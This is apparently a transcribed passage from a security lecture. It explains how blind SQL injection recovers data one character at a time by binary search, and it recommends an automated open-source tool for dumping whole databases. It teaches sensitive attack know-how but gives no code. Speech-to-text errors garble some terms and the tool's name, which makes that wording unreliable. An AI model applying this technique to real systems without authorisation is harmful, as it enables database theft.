know if that's less than a question mark and a question mark here I believe is kind of the middle of the alphabet of the ASP characters So if that's true, then we know Well, we write binary search and I explain it So that would obviously rule out one half and then we test the other half until we know exactly what the character is And then we change it get the second character do the same thing do the next character so on and so forth doing this over and over again and The cool thing is there are tools out there. There's a tool called sql math sql math open source So you download that will do this a hundred percent for you So you find the sql injection you plug it into the tool and it download the entire database Which is awesome. Cool. All right. See you on Monday